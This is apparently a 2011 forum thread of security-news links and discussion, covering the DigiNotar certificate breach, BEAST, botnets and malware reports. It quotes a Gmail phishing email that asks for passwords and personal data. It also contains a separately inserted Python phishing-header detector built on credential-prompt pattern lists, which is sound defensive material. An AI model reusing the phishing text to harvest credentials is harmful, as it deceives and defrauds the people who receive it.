... researchers found that the rising tide of fake anti-virus during the first half of 2011 includes a new variant consisting of fake desktop utilities, propelled by SpyEye and Zeus Trojan spam.
... the report found that security threats from social media continue to rise as social networking sites such as Facebook and Twitter are increasingly used in the workplace.
... rogue apps that impersonate online games in order to distribute malware.
... mobile security threats for the Android platform experienced a big upward spike, proliferated with the growth of the Android Market.
http://www.crn.com/news/security/231600446/fake-anti-virus-social-network-scams-on-the-rise-report.htm;jsessionid=Im5cs88mTXd-5XWl+mtdZQ**.ecappj02?cid=nl_sec
***
-
***
Apple Gives Internship To JailbreakMe Creator
Sometimes, if you can’t beat them, employ them. Nicholas Allegra, a 19-year-old hacker and creator of the Jailbreakme.com site, responsible for a series of jailbreaking iOS hacks, has officially been hired as an intern at Apple.
http://www.crn.com/news/security/231600297/apple-gives-internship-to-jailbreakme-creator-comex.htm?cid=nl_sec
***
-
***
Xpaj Botnet Intercepts 87 Million Web Searches In Click-Fraud Scheme
... researchers said Friday they recently uncovered the file-infector W32.Xpaj.B botnet, also known simply as Xpaj, by digging up command and control servers containing encrypted binary data, encryption keys, databases and Web applications used in conjunction with a widespread click-fraud scheme over the last several months.
http://www.crn.com/news/security/231600289/xpaj-botnet-intercepts-87-million-web-searches-in-click-fraud-scheme.htm?cid=nl_sec
***
-
***
Skype Cross-Site Scripting Flaw Enables Phone Session Attacks
A gaping cross-site scripting flaw in the latest version of Skype enables attackers to inject malicious code into a user’s phone sessions.
The cross-site scripting vulnerability occurs in Skype 5.5.1.113, affecting Windows XP, Vista and 7, and stems from a persistent code injection vulnerability due to a validation input error that prevents the VoIP client from properly inspecting phone numbers sourced from users’ home, office and mobile Skype accounts, according to researcher Levent Kayan.
http://www.crn.com/news/security/231600218/skype-cross-site-scripting-flaw-enables-phone-session-attacks.htm?cid=nl_sec
***
-
Fraudulent certificate triggers blocking from software companies
https://www.eff.org/deeplinks/2011/08/iranian-man-middle-attack-against-google
http://www.microsoft.com/technet/security/advisory/2607712.mspx
http://blog.mozilla.com/security/2011/08/29/fraudulent-google-com-certificate/
http://support.mozilla.com/en-US/kb/deleting-diginotar-ca-cert
http://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html
Fake Google certificate is the result of a hack
http://www.h-online.com/open/news/item/Fake-Google-certificate-is-the-result-of-a-hack-1333728.html
http://www.vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx
More Info
http://www.h-online.com/security/news/item/Updated-Chrome-and-Firefox-for-fraudulent-Google-certificate-available-1333898.html
http://my.opera.com/securitygroup/blog/2011/08/30/when-certificate-authorities-are-hacked-2
http://www.f-secure.com/weblog/archives/00002228.html
http://nakedsecurity.sophos.com/2011/08/31/google-blacklists-247-certificates-is-it-related-to-diginotar-hacking-incident
-
Et al,
Just thought I'd post this for other users and viewers to peruse at their leisure.
See: http://news.cnet.com/8301-27080_3-20099421-245/google-users-in-iran-targeted-in-ssl-spoof/?tag=contentMain;contentBody
re: Spoofed and Invalid CA certificates.
I come here every week or so to see what is out there as far as malware trends are going. Looks like the latest and greatest (sadly) is the one currently known as 'Enhanced Protection Virus'. I wish Essexboy all the best in finding a successful resolution for the two users who currently have this rogue program on their machines.
If we have known spoofed CAs, then is this not a part of the problem with Google Re-direct, since we don't really know for sure where the browser is ending up at? ??? ???
Note, too, the link provided for the program called 'Convergence', at the bottom of the blog, which is said to analyze for certificate revocations, that does not work on my machine. When the add-on is run in FF 6.0, it says it is not compatible.
As always, I run my browser in a sandbox to test before installing anything like this. Could this affect proper operation? Why would it say 'incompatible' if it is supposed to run on FF?
Just a question, if anyone cares to explain possible reasons.
I'm sure some have seen this blog, but just want to make sure everyone here at this forum knows about it.
mchain
XP Home Edition SP 3 P4 2 GB RAM Avast! Free Edition v. 6.0.1203
-
Security breach on kernel.org
http://kernel.org/#news
http://linux-foundation.org/weblogs/lwf/2011/08/31/the-cracking-of-kernelorg/
http://git-blame.blogspot.com/2011/08/how-to-inject-malicious-commit-to-git.html
-
Fraudulent certificate triggers blocking from software companies
https://www.eff.org/deeplinks/2011/08/iranian-man-middle-attack-against-google
http://www.microsoft.com/technet/security/advisory/2607712.mspx
http://blog.mozilla.com/security/2011/08/29/fraudulent-google-com-certificate/
http://support.mozilla.com/en-US/kb/deleting-diginotar-ca-cert
http://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html
Fake Google certificate is the result of a hack
http://www.h-online.com/open/news/item/Fake-Google-certificate-is-the-result-of-a-hack-1333728.html
http://www.vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx
More Info
http://www.h-online.com/security/news/item/Updated-Chrome-and-Firefox-for-fraudulent-Google-certificate-available-1333898.html
http://my.opera.com/securitygroup/blog/2011/08/30/when-certificate-authorities-are-hacked-2
http://www.f-secure.com/weblog/archives/00002228.html
http://nakedsecurity.sophos.com/2011/08/31/google-blacklists-247-certificates-is-it-related-to-diginotar-hacking-incident
The DigiNotar Debacle, and what you should do about it
https://blog.torproject.org/blog/diginotar-debacle-and-what-you-should-do-about-it
-
@Asyn,
Clicking on the link in your last post brings up the following:
Screenshot: http://my.jetscreenshot.com/2701/20110902-g9jm-49kb
Strange, the only thing I had blocked in OpenDNS was Adult content and randomized ISPs.
I don't see any here and yet the site was blocked.
I've removed the filter.
-
@Asyn,
Clicking on the link in your last post brings up the following:
Sorry Bob, can't help you, I just tried it again and it still works here...!
Do you use OpenDNS..?? The alert seems related to it.
-
Yes I do and I guess according to them, it's not a safe place to go.
-
No problem with the link either, not using OpenDNS either.
Can't see why OpenDNS would object to this, however it would also depend on what your dashboard settings are, if you have any set.
-
Yes I do and I guess according to them, it's not a safe place to go.
Well, usually it's one of the safest places to go...!!! ;)
http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29
https://www.torproject.org/index.html.en
-
Yes I do and I guess according to them, it's not a safe place to go.
I'm using OpenDNS and that link is not blocked for me, but I'm not using the dashboard settings, just the basic DNS addresses.
-
Yes I do and I guess according to them, it's not a safe place to go.
It's definitely not a safe place to go according to OpenDNS!
-
Yes I do and I guess according to them, it's not a safe place to go.
It's definitely not a safe place to go according to OpenDNS!
I just removed that filter and now the site shows.
Apparently the blog likes to hide its whereabouts.
-
***
Beladen Loads Hacked Web Sites With Badness
At least 40,000 Web sites recently were hacked and retrofitted with instructions that silently attempt to infest visitor PCs with malicious software, security experts warn.
Each hacked site redirects to Web sites that bombard the visitor's PC with about 20 different Web browser vulnerabilities and browser plug-in attacks, targeting older, insecure versions of several third-party applications like QuickTime and Winzip.
This latest mass Web site hack is thought to be separate from a similar recent incident referred to as "Gumblar," so named because an estimated 60,000 domains hijacked over several weeks redirected visitors to a malware-serving Web site named Gumblar.cn, among others.
If you were to visit one of these sites hacked with the Beladen code, you probably wouldn't notice anything amiss. In the background, though, malicious code inserted into the site would force your browser to invisibly contact google-analyt1cs.net (please don't visit this site either), which checks the name of the referring Web site, records the date and time stamp of the visit, and then forwards the victim on to the Beladen site, which then silently attempts to exploit a series of browser vulnerabilities.
http://voices.washingtonpost.com/securityfix/2009/06/beladen_loads_hacked_web_sites.html
***
CharlieO,
Just clicked the above link, and got a text page of some sort just before the intended site appeared and loaded as "Washington Post". Do not know what I saw, but when I saw it, I went, oh no!, as this behavior may describe exactly the problem you are referring to.
As I run my browser sandboxed, it does not appear to be affected.
Do you see the same behavior?
mchain
XP Home Edition SP3 P4 2.8 2GB RAM Avast! Free 6.0.1203
-
Fraudulent certificate triggers blocking from software companies
https://www.eff.org/deeplinks/2011/08/iranian-man-middle-attack-against-google
http://www.microsoft.com/technet/security/advisory/2607712.mspx
http://blog.mozilla.com/security/2011/08/29/fraudulent-google-com-certificate/
http://support.mozilla.com/en-US/kb/deleting-diginotar-ca-cert
http://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html
Fake Google certificate is the result of a hack
http://www.h-online.com/open/news/item/Fake-Google-certificate-is-the-result-of-a-hack-1333728.html
http://www.vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx
More Info
http://www.h-online.com/security/news/item/Updated-Chrome-and-Firefox-for-fraudulent-Google-certificate-available-1333898.html
http://my.opera.com/securitygroup/blog/2011/08/30/when-certificate-authorities-are-hacked-2
http://www.f-secure.com/weblog/archives/00002228.html
http://nakedsecurity.sophos.com/2011/08/31/google-blacklists-247-certificates-is-it-related-to-diginotar-hacking-incident
The DigiNotar Debacle, and what you should do about it
https://blog.torproject.org/blog/diginotar-debacle-and-what-you-should-do-about-it
Slammed with a lifetime ban
http://www.theregister.co.uk/2011/09/03/diginotar_game_over/
-
more on the above
Secure browsing turns insecure (again)
http://www.norman.com/security_center/security_center_archive/2011/secure_browsing_turns_insecure_again/en
-
more on the above
Secure browsing turns insecure (again)
http://www.norman.com/security_center/security_center_archive/2011/secure_browsing_turns_insecure_again/en
Gargamel360 and Pondus,
Shoot, just when I mistakenly thought things might get better! It would seem that what is needed is for most, if not all, IP traffic to be HTTPS once the issues are worked out with security certificates.
I know, I know, then the model of an open internet would be lost, but how does the average user today protect themselves from a corrupt and malicious nation-state, or even be aware that such a problem or situation exists?
The original model of the internet was for, among other things, military security and communications in the beginning, but as time has gone by, and as things have changed and progressed, I am beginning to think that this original model is sordidly archaic and obsolete, and that very ominous and dark clouds and storms are just forming beyond the horizon, unseen, unheard, and unfelt. These threats are becoming more real by the minute, and the need for those to preserve the world as a safe place for freedom is becoming more dire with each passing moment. The only way to know for sure that you are talking to who you think you are is now intrinsically intertwined with the validity of a security certificate. And, even then....
And the Iranian government is denying this right to its own citizens? What, pray tell, is the value of a human life in Iran? Let me guess....
Knowledge is a wonderful power if used judiciously and with fairness towards all. Remember, it is for us, and for our children, and our children's children. They will inherit this world after us, and we should not let this darkness prevail or even descend upon, the lives of those innocent of this maliciousness, or for those that will follow.
I say, Not on our watch.
Not if I can help it.
mchain
-
Fraudulent certificate triggers blocking from software companies
https://www.eff.org/deeplinks/2011/08/iranian-man-middle-attack-against-google
http://www.microsoft.com/technet/security/advisory/2607712.mspx
http://blog.mozilla.com/security/2011/08/29/fraudulent-google-com-certificate/
http://support.mozilla.com/en-US/kb/deleting-diginotar-ca-cert
http://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html
Fake Google certificate is the result of a hack
http://www.h-online.com/open/news/item/Fake-Google-certificate-is-the-result-of-a-hack-1333728.html
http://www.vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx
More Info
http://www.h-online.com/security/news/item/Updated-Chrome-and-Firefox-for-fraudulent-Google-certificate-available-1333898.html
http://my.opera.com/securitygroup/blog/2011/08/30/when-certificate-authorities-are-hacked-2
http://www.f-secure.com/weblog/archives/00002228.html
http://nakedsecurity.sophos.com/2011/08/31/google-blacklists-247-certificates-is-it-related-to-diginotar-hacking-incident
The DigiNotar Debacle, and what you should do about it
https://blog.torproject.org/blog/diginotar-debacle-and-what-you-should-do-about-it
Slammed with a lifetime ban
http://www.theregister.co.uk/2011/09/03/diginotar_game_over/
DigiNotar Damage Disclosure
https://blog.torproject.org/blog/diginotar-damage-disclosure
https://www.govcert.nl/english/service-provision/knowledge-and-publications/factsheets/factsheet-fraudulently-issued-security-certificate-discovered.html
-
<snip>
Shoot, just when I mistakenly thought things might get better! It would seem that what is needed is for most, if not all, IP traffic to be HTTPS once the issues are worked out with security certificates.
<snip>
mchain
For me that would be the worst possible security choice, as the Web Shield doesn't monitor HTTPS traffic; so wouldn't provide the same level of protection that it is very good at on HTTP traffic. Blocking malware at source, sniffing out exploits and hacked sites, this happens to lots of sites and just because you are using an HTTPS connection doesn't stop that.
You only need to take a browse round the viruses and worms forum to see just how beneficial its protection is. Many people only find out their site has been hacked after avast users tell them or if they come to the forums to report what they consider a false positive only to find the detection is good.
Be careful what you wish for ;D
-
<snip>
Shoot, just when I mistakenly thought things might get better! It would seem that what is needed is for most, if not all, IP traffic to be HTTPS once the issues are worked out with security certificates.
<snip>
mchain
For me that would be the worst possible security choice, as the Web Shield doesn't monitor HTTPS traffic; so wouldn't provide the same level of protection that it is very good at on HTTP traffic. Blocking malware at source, sniffing out exploits and hacked sites, this happens to lots of sites and just because you are using an HTTPS connection doesn't stop that.
You only need to take a browse round the viruses and worms forum to see just how beneficial its protection is. Many people only find out their site has been hacked after avast users tell them or if they come to the forums to report what they consider a false positive only to find the detection is good.
Be careful what you wish for ;D
DavidR,
There is much I do not know. This fact re WebShield was unknown to me. Perhaps, when seen in the light of what you say, then, it is best to leave things as they are; but we also need to maintain and keep our awareness of exploits designed to hurt and cripple those who mean no harm to others.
Among all the other activities we do, this one, use of the Internet, is in but a smaller realm, but has become essential to, and is in part of, our structure of our modern world. If we lose control of that, then our future may be not as easily foreseeable as it may be now.
Few may agree with my assessment; it is, however, meant in all sincerity.
Perhaps Avast! could monitor HTTPS traffic as well if need be. That, I think, was an implied point in what I was trying to say, although it was never specifically directed towards Avast!. I am sorry I did not make this clear; I was not aware of, and did not know of, some of the basic structures upon which the Internet is built. I did not know Avast! did not monitor HTTPS traffic, for example.
What I wish for is something better than we now have. I think the need is to find a way to prevent exploitative behavior in the first place. How to do this I cannot say.
If I wanted to learn how, and I do, I think here in this forum would be an excellent place to begin.
mchain
XP Home Edition SP3 2GB RAM Avast! 6.0.1203
-
The whole point of HTTPS (secure encrypted connection) is to keep prying eyes out, including your AV and this is no different from most other AVs, that is the ones that even have web content scanning.
The problem being the avast web shield redirects http traffic through its 'localhost' proxy; so it would have to handle the secure connection in a similar way to Mail Shield does to possibly do this. Right now that doesn't/can't happen, but it is I believe something they are working on for a future version of avast (no point in asking dates, etc. as this isn't firm right now).
-
@mchain: If you want to discuss this further please open a new topic.
Thanks,
asyn
-
***
Some of the below has already been posted but there are some new items to be aware of in the slide show presentation.
10 Biggest Cyber Attacks In August
Anonymous hackers kicked off the month of August with a cyber attack against FBI contractor ManTech International, which they claimed compromised almost 400 megabytes of data from the managed cybersecurity provider and was part of its AntiSec campaign -- a collaborative effort between Anonymous and spin-off hacker group LulzSec.
Included in the stolen data were numerous documents belonging to NATO, the U.S. Army, the U.S Department of Homeland Security, the U.S. State Department and the U.S. Department of Justice, as well as other personnel information, the group said.
http://www.crn.com/slide-shows/security/231600608/10-biggest-cyber-attacks-in-august.htm;jsessionid=usMK7Z0OR4pmmNi6OATDcw**.ecappj02?cid=nl_sec
***
-
***
British Police Arrest Two More Anonymous Hacker Suspects
British police arrested two men Thursday allegedly affiliated with the global hacker collective Anonymous and spinoff group LulzSec.
British police arrested 20-year-old Christopher Weatherhead, from Northampton, and Ashley Rhodes, 26, from London, charging both individuals with computer crimes.
Also as part of the same crackdown, two other suspects -- 22-year-old Peter Bigson, as well as a 17-year-old from Chester -- have already been arrested and charged with computer crimes, which allegedly included cyber attacks against PayPal, Amazon (NSDQ:AMZN), MasterCard , Bank of America and Visa.
http://www.crn.com/news/security/231600764/british-police-arrest-two-more-anonymous-hacker-suspects.htm?cid=nl_sec
***
-
Microsoft Security Advisory (2607712)
Fraudulent Digital Certificates Could Allow Spoofing
http://www.microsoft.com/technet/security/advisory/2607712.mspx
Update available now through Windows update.
* A restart is required for all editions of Windows XP and of Windows Server 2003.
* A restart is not required for all editions of Windows Vista, of Windows 7, of Windows Server 2008, and of Windows Server 2008 R2. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are being used, this update will require a restart. If this behavior occurs, you receive a message that advises you to restart.
-
***
Man Gets 6-Year Jail Term For 'Sextortion'
A California man was sentenced to six years in prison for hacking into dozens of computers, stealing personal information and demanding naked images from female victims in exchange for not releasing the stolen information.
http://www.wbaltv.com/r/29057215/detail.html
***
-
Fraudulent certificate triggers blocking from software companies
https://www.eff.org/deeplinks/2011/08/iranian-man-middle-attack-against-google
http://www.microsoft.com/technet/security/advisory/2607712.mspx
http://blog.mozilla.com/security/2011/08/29/fraudulent-google-com-certificate/
http://support.mozilla.com/en-US/kb/deleting-diginotar-ca-cert
http://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html
Fake Google certificate is the result of a hack
http://www.h-online.com/open/news/item/Fake-Google-certificate-is-the-result-of-a-hack-1333728.html
http://www.vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx
More Info
http://www.h-online.com/security/news/item/Updated-Chrome-and-Firefox-for-fraudulent-Google-certificate-available-1333898.html
http://my.opera.com/securitygroup/blog/2011/08/30/when-certificate-authorities-are-hacked-2
http://www.f-secure.com/weblog/archives/00002228.html
http://nakedsecurity.sophos.com/2011/08/31/google-blacklists-247-certificates-is-it-related-to-diginotar-hacking-incident
The DigiNotar Debacle, and what you should do about it
https://blog.torproject.org/blog/diginotar-debacle-and-what-you-should-do-about-it
Slammed with a lifetime ban
http://www.theregister.co.uk/2011/09/03/diginotar_game_over/
DigiNotar Damage Disclosure
https://blog.torproject.org/blog/diginotar-damage-disclosure
https://www.govcert.nl/english/service-provision/knowledge-and-publications/factsheets/factsheet-fraudulently-issued-security-certificate-discovered.html
DigiNotar breach due to disastrous security
http://www.h-online.com/security/news/item/DigiNotar-breach-due-to-disastrous-security-Update-1337573.html
http://www.rijksoverheid.nl/bestanden/documenten-en-publicaties/rapporten/2011/09/05/diginotar-public-report-version-1/rapport-fox-it-operation-black-tulip-v1-0.pdf
Browser makers update their DigiNotar disaster updates
http://www.h-online.com/security/news/item/Browser-makers-update-their-DigiNotar-disaster-updates-1338144.html
-
GlobalSign suspend issuing SSL certificates
http://www.h-online.com/security/news/item/GlobalSign-suspend-issuing-SSL-certificates-1338634.html
-
Win32/Delf.QCZ also known as "Avast enchanced protection mode"
Additional details http://www.eset.com/about/blog/blog/article/win32delf-qcz-additional-details/
Something interesting and new?
When someone logs in from the infected computer, the credentials are stored in the registry.
-
Mouse attack ;D
Netragard’s Hacker Interface Device (HID).
http://pentest.snosoft.com/2011/06/24/netragards-hacker-interface-device-hid/
We (Netragard) recently completed an engagement for a client with a rather restricted scope. The scope included a single IP address bound to a firewall that offered no services whatsoever. It also excluded the use of social attack vectors based on social networks, telephone, or email and disallowed any physical access to the campus and surrounding areas. With all of these limitations in place, we were tasked with penetrating into the network from the perspective of a remote threat, and succeeded.
-
Sorry :-[ if this is a double post
Monthly Malware Statistics: August 2011
August in Figures
The following statistics were compiled in August using data collected from computers running Kaspersky Lab products:
193,989,043 networks attacks were blocked;
64,742,608 web-borne infections were prevented;
258,090,156 malicious programs were detected and neutralized on user computers;
80,155,498 heuristic verdicts were registered.
August is traditionally one of the busiest months for the information security industry, despite the summer holiday season. Two of the top security conferences take place in August in the US: BlackHat and Defcon. These two events are a popular platform for announcing the results of top studies and not only discuss the results of the past year, but address the issues looming on the horizon. New attack methods are discussed at the conferences, in addition to different hacking technologies — some of which, unfortunately, are subsequently applied in malicious programs. Furthermore, the summer holiday season creates additional problems for individual computer users and organizations alike. People on vacation use the Internet more frequently at Internet cafes, free WiFi hotspots, airports, etc., which means they are outside of their usual security perimeter and have higher chances of becoming the victims of malicious users.
Out-of-the-box activity
Let’s take a closer look at some of the new malicious programs and malicious technologies employed by “the other side” in August.
Ice IX: the bastard child of ZeuS
http://www.securelist.com/en/analysis/204792190/Monthly_Malware_Statistics_August_2011
-
Security breach on kernel.org
http://kernel.org/#news
http://linux-foundation.org/weblogs/lwf/2011/08/31/the-cracking-of-kernelorg/
http://git-blame.blogspot.com/2011/08/how-to-inject-malicious-commit-to-git.html
Security breach at Linux Foundation
http://www.h-online.com/open/news/item/Security-breach-at-Linux-Foundation-1340733.html
-
GlobalSign suspend issuing SSL certificates
http://www.h-online.com/security/news/item/GlobalSign-suspend-issuing-SSL-certificates-1338634.html
Incident Response
http://www.globalsign.com/company/press/090611-security-response.html
-
Return of the BIOS trojans
http://www.h-online.com/security/news/item/Return-of-the-BIOS-trojans-1341421.html
-
more on BIOS malware
Malware burrows deep into computer BIOS to escape AV - Mebromi rootkit also targets master boot record
http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/
-
Android banking trojan intercepts security texts - Thought you were so clever, Mr Banker Guy
http://www.theregister.co.uk/2011/09/14/spyeye_targets_android_phones/
-
***
Adobe 'Critical' Security Update Removes Fraudulent DigiNotar Certificates
Adobe (NSDQ:ADBE) joined Microsoft (NSDQ:MSFT) with its own “Patch Tuesday,” issuing a security update that repaired a slew of critical flaws in numerous versions of Reader and Acrobat products, including potential vulnerability to attacks resulting from fraudulent DigiNotar certificates.
Specifically, the Adobe security update repaired critical flaws in Adobe Reader 10.1 and earlier versions for Windows and Mac OS X, as well as Adobe Reader 9.4.2 and earlier versions for UNIX and Adobe Acrobat X and earlier versions for Windows and Mac OS X.
http://www.crn.com/news/security/231601428/adobe-critical-security-update-removes-fraudulent-diginotar-certificates.htm;jsessionid=PCjw2qxsScayBtDzSLwHzw**.ecappj01?cid=nl_sec
***
-
***
Microsoft Fixes Office, Excel Flaws In 'Non-Critical' Patch Tuesday Release
Microsoft (NSDQ:MSFT) issued a modest patch load for its September Patch Tuesday release, but coupled the security bulletin with yet another update blacklisting more fraudulent DigiNotar SSL certificates.
Microsoft’s Patch Tuesday bulletin mildly surprised the security community by containing just five updates, none of which were deemed with the highest severity ranking of "critical."
http://www.crn.com/news/security/231601362/microsoft-fixes-office-excel-flaws-in-non-critical-patch-tuesday-release.htm?cid=nl_sec
***
-
Report: Japanese defence contractor hacked
http://www.h-online.com/security/news/item/Report-Japanese-defence-contractor-hacked-1345461.html
http://www.reuters.com/article/2011/09/19/mitsubishiheavy-computer-idUSL3E7KJ0BD20110919
-
Hackers break SSL encryption used by millions of sites
http://www.theregister.co.uk/2011/09/19/beast_exploits_paypal_ssl/
-
Hackers break SSL encryption used by millions of sites
http://www.theregister.co.uk/2011/09/19/beast_exploits_paypal_ssl/
:o Thanks for that info logos..!
-
Hackers break SSL encryption used by millions of sites
http://www.theregister.co.uk/2011/09/19/beast_exploits_paypal_ssl/
:o Thanks for that info logos..!
Yeah, this could be the worst security-related disaster ever.
-
Serious yes, but I want to know if this POC would work on a site not hacked.
The stealthy piece of JavaScript works with a network sniffer to decrypt encrypted cookies a targeted website uses to grant access to restricted user accounts.
So there has to be this network sniffer and a piece of 'stealthy' JavaScript; where does it come from? It would either have to be inserted into the site page (hacked) or be an off-site loading/running of a script (cross-site scripting, XSS, again a hacked site).
Well I'm looking at what protection can be offered in the form of the web shield (good on hacked sites and inserted script tags, etc.) and things like NoScript and RequestPolicy firefox add-ons to prevent local or XSS scripts from running (unless of course you gave permission).
“BEAST is like a cryptographic Trojan horse – an attacker slips a bit of JavaScript into your browser, and the JavaScript collaborates with a network sniffer to undermine your HTTPS connection,”
So again I don't see any mention in all of this of a systems local security software and how it plays out in this.
EDIT: incorrect formatting of quote.
-
Beginning to wonder if anything is safe any more.
-
I think there is a degree of hype/fear-mongering in this when it doesn't take any account of users security measures or even mention methods of combating it.
-
Just note this PoC comes from researchers who already are responsible for another PoC forcing Microsoft and Oracle to do out-of-band patches in the past...
So I would not underestimate the seriousness...
It's already been discussed that it takes only 5 minutes to decipher, and most sites have a 10-minute expiry, so this is nasty.
Also I hope this forces all websites to upgrade to the 2nd revision of TLS 1.2 (SSL 3.3).
-
***
Russian hacker sells home and cars to pay RBS
A Russian hacker who breached the security of RBS' WorldPay service and stole $9m (£6m) has had his property sold to compensate the bank.
Viktor Pleshchuk's two flats and two cars, a BMW and a Lada, were auctioned off in Saint Petersburg on Monday.
According to a Russian news portal RIA Novosti, the sale raised 10m roubles (£200,000).
http://www.bbc.co.uk/news/technology-14989264
***
-
Botnets on discount!
Creating a botnet has become insanely easy and cheap
http://blog.gdatasoftware.com/blog/article/botnets-on-discount.html
-
***
New malicious email attachments come with accusations, threats
The latest social engineering trick to get victims to open malicious email attachments accuses them of being spammers and threatens to sue them if they don't stop. It's all in an attempt to get targets to open up the zip attachment by telling them it contains evidence of their spamming. Actually it's an .exe file that infects the machine but displays like a document.
The emails are dressed up to look like they come from real businesses that are upset because the recipient has been spamming them. "The emails even formally claims that legal action will be taken because of the spam you have sent," says the blog.
http://www.networkworld.com/news/2011/092111-malware-251104.html
***
-
Aftermath - VASCO Announces Bankruptcy Filing by DigiNotar B.V.
http://www.vasco.com/company/press_room/news_archive/2011/news_vasco_announces_bankruptcy_filing_by_diginotar_bv.aspx
-
I'm pretty sure nobody here would fall for it but I got an email purporting to be from Google about upgrading my gmail. The message was the following:
Dear Gmail Account User,
A DGTFX virus has been detected in your folders
Your email account has to be upgraded to our new
Secured DGTFX anti-virus 2011 version to prevent
damages to our email log and your important
files.
Click your reply tab, Fill the columns below and
send back or your email account will be terminated
immediately to avoid spread of the virus.
USER ID:
PASSWORD:
PHONE NUMBER:
DATE OF BIRTH:
Gmail Technical Team
Note that your password will be encrypted with
1024-bit RSA keys for your password safety to
avoid any unauthorized user.
It said it was from upgrade @gmail.com but a thorough inspection of the header revealed that it actually came from somebody in Romania since it had a .ro at the end of the address.
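The header mismatch described in the post above, as an added example that is not part of the original post: a small Python check that compares the From: domain with the envelope sender and with the server that handed the message in, and looks for credential prompts and pressure phrases in the body. The two sample messages, their domains and the 192.0.2.x addresses are constructed for this illustration, and the helper names (check_message, domain_of, same_org) are hypothetical, not from any product.

```python
"""Added example, not part of the forum post: a header and body check that
flags the kind of 'upgrade your Gmail' phishing message quoted above.
The sample messages, their domains and their IP addresses are constructed
for this example (RFC 5737 documentation address space)."""
import re
from email import message_from_string, policy
from email.utils import parseaddr

# Constructed sample. The From: header claims gmail.com, but the envelope
# sender (Return-Path) and the sending server in Received: are a .ro domain,
# which is the mismatch the poster found by inspecting the header.
PHISHING_SAMPLE = """\
Return-Path: <bounce@mailer.example-sender.ro>
Received: from mailer.example-sender.ro (mailer.example-sender.ro [192.0.2.10])
    by mx.example.net with ESMTP id abc123 for <victim@example.net>
From: "Gmail Technical Team" <upgrade@gmail.com>
To: victim@example.net
Subject: A DGTFX virus has been detected in your folders

Click your reply tab, fill the columns below and send back
or your email account will be terminated immediately.

USER ID:
PASSWORD:
PHONE NUMBER:
DATE OF BIRTH:
"""

# Constructed legitimate-looking sample for comparison: all three origins
# agree and nothing asks for credentials.
CLEAN_SAMPLE = """\
Return-Path: <notify@example.org>
Received: from mail.example.org (mail.example.org [192.0.2.20])
    by mx.example.net with ESMTP id def456 for <victim@example.net>
From: "Example Notifications" <notify@example.org>
To: victim@example.net
Subject: Your monthly statement is ready

Your statement for September is available in your account.
"""

CREDENTIAL_PROMPTS = ("USER ID:", "PASSWORD:", "DATE OF BIRTH:")
URGENCY_PHRASES = ("terminated immediately", "send back")


def domain_of(address):
    """Lower-cased domain of an e-mail address, or '' if there is none."""
    addr = parseaddr(address)[1]
    return addr.rpartition("@")[2].lower()


def same_org(host, domain):
    """True if host is the domain itself or a host under it."""
    host = host.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def check_message(raw):
    """Return the extracted origins plus a list of human-readable findings."""
    msg = message_from_string(raw, policy=policy.default)
    from_domain = domain_of(str(msg["From"] or ""))
    envelope_domain = domain_of(str(msg["Return-Path"] or ""))
    # Received: headers are prepended at each hop, so the last one in the
    # list is the hop nearest the sender.
    received = msg.get_all("Received") or []
    match = re.search(r"from\s+(\S+)", str(received[-1])) if received else None
    sending_host = match.group(1) if match else ""
    body = msg.get_content()

    findings = []
    if envelope_domain and envelope_domain != from_domain:
        findings.append(f"From: claims {from_domain} but envelope sender is {envelope_domain}")
    if sending_host and not same_org(sending_host, from_domain):
        findings.append(f"From: claims {from_domain} but message was handed in by {sending_host}")
    prompts = [p for p in CREDENTIAL_PROMPTS if p in body.upper()]
    if prompts:
        findings.append("asks for credentials by reply: " + ", ".join(prompts))
    urgent = [p for p in URGENCY_PHRASES if p in body.lower()]
    if urgent:
        findings.append("pressure language: " + ", ".join(urgent))
    return {"from_domain": from_domain, "envelope_domain": envelope_domain,
            "sending_host": sending_host, "findings": findings,
            "suspicious": len(findings) >= 2}


if __name__ == "__main__":
    for name, raw in (("phishing", PHISHING_SAMPLE), ("clean", CLEAN_SAMPLE)):
        result = check_message(raw)
        print(name, "->", "suspicious" if result["suspicious"] else "ok")
        for finding in result["findings"]:
            print("  -", finding)
```

The check deliberately requires two independent findings before calling a message suspicious, since a single mismatched Return-Path is common with mailing lists and forwarders; the origin comparison is the part worth automating, because it is exactly what the poster had to do by hand.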
-
Mac trojan posing as a PDF file
http://www.f-secure.com/weblog/archives/00002241.html
-
Mac trojan posing as a PDF file
http://www.f-secure.com/weblog/archives/00002241.html
Also A new trojan has been released targeting the Macintosh Chinese-language user community. The trojan appears to the user to be a PDF containing a Chinese language article on the long-running dispute over whether Japan or China owns the Diaoyu Islands.
http://blog.eset.com/2011/09/23/pdf-trojan-appears-on-mac-os-x
-
Hackers break SSL encryption used by millions of sites
http://www.theregister.co.uk/2011/09/19/beast_exploits_paypal_ssl/
First solutions for SSL/TLS vulnerability
http://www.h-online.com/security/news/item/First-solutions-for-SSL-TLS-vulnerability-1349813.html
-
Hi Asyn,
There is a FixIT - http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx (link from social.s-msft.com - link source author: swiat)
polonus
-
Hi Asyn,
There is a FixIT - http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx (link from social.s-msft.com - link source author: swiat)
polonus
Yes but sadly only for W7.
Chrome and Firefox use the Network Security Services (NSS), which only support TLS 1.0. Windows Vista, XP, 2000 and Server 2003 as well as Server 2008 are also incapable of using TLS 1.1 by default.
-
Mysql.com hacked, infecting visitors with malware
http://blog.armorize.com/2011/09/mysqlcom-hacked-infecting-visitors-with.html
https://krebsonsecurity.com/2011/09/mysql-com-sold-for-3k-serves-malware/
-
